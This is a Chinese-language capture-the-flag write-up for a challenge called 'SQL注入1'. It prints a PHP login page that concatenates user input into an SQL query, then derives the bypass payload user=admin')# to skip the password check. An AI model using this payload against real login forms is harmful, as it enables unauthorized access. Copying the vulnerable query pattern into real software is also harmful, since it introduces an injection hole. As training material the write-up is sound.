SQL注入1
1.题目
2.我们查看一下题目
3.我们查看一下Source,看看有什么收获
好的,我们接下来分析代码
<html>
<head>
Secure Web Login
</head>
<body>
<?php
if($_POST[user] && $_POST[pass]) {
mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
mysql_select_db(SAE_MYSQL_DB);
$user = trim($_POST[user]);
$pass = md5(trim($_POST[pass]));
$sql="select user from ctf where (user='".$user."') and (pw='".$pass."')";
echo '</br>'.$sql;
$query = mysql_fetch_array(mysql_query($sql));
if($query[user]=="admin") {
echo "<p>Logged in! flag:******************** </p>";
}
if($query[user] != "admin") {
echo("<p>You are not admin!</p>");
}
}
echo $query[user];
?>
<form method=post action=index.php>
<input type=text name=user value="Username">
<input type=password name=pass value="Password">
<input type=submit>
</form>
</body>
<a href="index.phps">Source</a>
</html>
核心函数释义:
- trim() 函数移除字符串两侧的空白字符或其他预定义字符。
- mysql_query() 函数执行一条 MySQL 查询。
返回值
mysql_query() 仅对 SELECT,SHOW,EXPLAIN 或 DESCRIBE 语句返回一个资源标识符,如果查询执行不正确则返回 FALSE。
对于其它类型的 SQL 语句,mysql_query() 在执行成功时返回 TRUE,出错时返回 FALSE。
非 FALSE 的返回值意味着查询是合法的并能够被服务器执行。这并不说明任何有关影响到的或返回的行数。很有可能一条查询执行成功了但并未影响到或并未返回任何行。 - mysql_fetch_array() 函数从结果集中取得一行作为关联数组,或数字数组,或二者兼有
返回根据从结果集取得的行生成的数组,如果没有更多行则返回 false。
4.核心代码分析:
我们需要user=admin
假设加密后的pass=21232f297a57a5a743894a0e4a801fc3
$sql="select user from ctf where (user='"admin"') and (pw='21232f297a57a5a743894a0e4a801fc3')";
echo '</br>'.$sql; //$sql=select user from ctf where (user='"admin"') and (pw='21232f297a57a5a743894a0e4a801fc3')
$query = mysql_fetch_array(mysql_query($sql));
//mysql_query执行$sql语句,但是返回You are not admin!
//这里考虑的情况可能是,账户密码不正确,mysql_query($sql)返回false,所以mysql_fetch_array()括号内的内容是false,并不是一个数值,所以无法形成数组,当然$query变量里也就没有user与admin了。
//虽然我们不知道它密码,但我们看它要我们[user]==admin,于是猜想极有可能用户名user是存在的,因此,最后尝试$sql=select user from ctf where (user='admin'),直接在数据库中查询用户名admin,sql语句返回的结果肯定会有类似user=admin,最后在mysql_fetch_array函数下生成数组,于是我们构造payload,如何构造请看第5点
if($query[user]=="admin") {
echo "<p>Logged in! flag:******************** </p>";
if($query[user] != "admin") {
echo("<p>You are not admin!</p>");
}
5.构造payload
if($_POST[user] && $_POST[pass])
$sql="select user from ctf where (user='".$user."') and (pw='".$pass."')"; //$user带进去后,这里的双引号就会消失的
构造语句:user=admin')#&pass=Password
6.得到flag